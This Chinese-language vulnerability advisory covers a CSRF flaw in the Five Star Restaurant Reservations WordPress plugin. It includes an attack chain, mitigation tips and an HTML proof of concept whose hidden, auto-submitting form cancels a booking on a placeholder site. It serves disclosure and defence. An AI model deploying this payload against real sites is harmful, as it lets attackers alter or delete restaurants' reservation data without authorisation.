CVE-2025-68601 Five Star Restaurant Reservations插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-68601

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Rustaurius Five Star Restaurant Reservations

漏洞概述

CVE-2025-68601是WordPress插件Five Star Restaurant Reservations中的一个跨站请求伪造（CSRF）漏洞。该插件由Rustaurius开发，主要用于餐厅预订管理功能，允许餐厅业主在线接受和管理客户预订。漏洞存在于插件的多个管理功能中，由于缺少适当的CSRF令牌验证，攻击者可以诱导已登录的管理员用户在不知情的情况下执行非预期的操作。攻击者可以伪造请求来修改预订状态、删除预订记录或更改插件设置。由于该插件直接与餐厅业务数据交互，CSRF漏洞可能导致预订数据被恶意篡改，影响餐厅正常运营秩序。此漏洞无需攻击者具备特殊权限，只需诱骗目标用户访问恶意页面即可发起攻击。CVSS评分5.4属于中等严重程度，主要因为攻击需要用户交互且无法直接获取系统权限。

技术细节

该CSRF漏洞存在于Five Star Restaurant Reservations插件的预订管理功能中。攻击原理是利用Web应用程序对用户请求的合法性验证不足。当WordPress管理员登录后，浏览器会自动发送认证Cookie到目标站点。攻击者构造一个恶意HTML页面，包含自动提交的表单，该表单模拟管理员对插件预订管理功能的合法请求。由于插件未正确实现CSRF防护机制（缺少token验证或Referer检查），服务器无法区分合法请求和攻击者伪造的请求。攻击者可以将恶意页面托管在任何网站上，通过钓鱼邮件、社交工程或恶意链接诱导管理员访问。当管理员打开恶意页面时，浏览器会自动向目标WordPress站点发送携带有效认证Cookie的请求，导致预订数据被恶意修改或删除。攻击成功的前提是管理员处于登录状态且访问了攻击者构造的页面。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交的表单，模拟管理员对Five Star Restaurant Reservations插件的合法操作请求

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或恶意链接诱导WordPress管理员访问该恶意页面

STEP 3

步骤3

管理员浏览器自动向目标WordPress站点发送携带有效认证Cookie的POST请求

STEP 4

步骤4

由于插件缺少CSRF令牌验证，服务器将恶意请求视为合法请求并执行相应操作

STEP 5

步骤5

预订数据被恶意修改或删除，攻击者成功完成CSRF攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-68601 -->
<!-- This PoC demonstrates modifying a restaurant reservation -->
<!DOCTYPE html>
<html>
<head>
    <title>Reservation Update</title>
</head>
<body>
    <h1>Restaurant Reservation System</h1>
    <p>If you see this page, the CSRF attack has been executed.</p>
    
    <!-- Auto-submit form to modify reservation -->
    <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="restaurant_reservations_update_booking">
        <input type="hidden" name="booking_id" value="123">
        <input type="hidden" name="status" value="cancelled">
        <input type="hidden" name="nonce" value="">
    </form>
    
    <script>
        // Auto-submit the form without user awareness
        document.getElementById('csrfForm').submit();
        
        // Log result
        console.log('CSRF request sent for CVE-2025-68601');
    </script>
</body>
</html>

影响范围

Five Star Restaurant Reservations <= 2.7.8

防御指南

临时缓解措施

在官方修复版本发布前，可以采取以下临时缓解措施：1）启用WordPress的CSRF保护功能；2）要求管理员在完成敏感操作后重新登录；3）限制管理员访问未知来源的链接；4）使用安全插件如Wordfence或Sucuri提供额外的CSRF防护；5）对管理员进行安全意识培训，提醒不要点击未知来源的链接。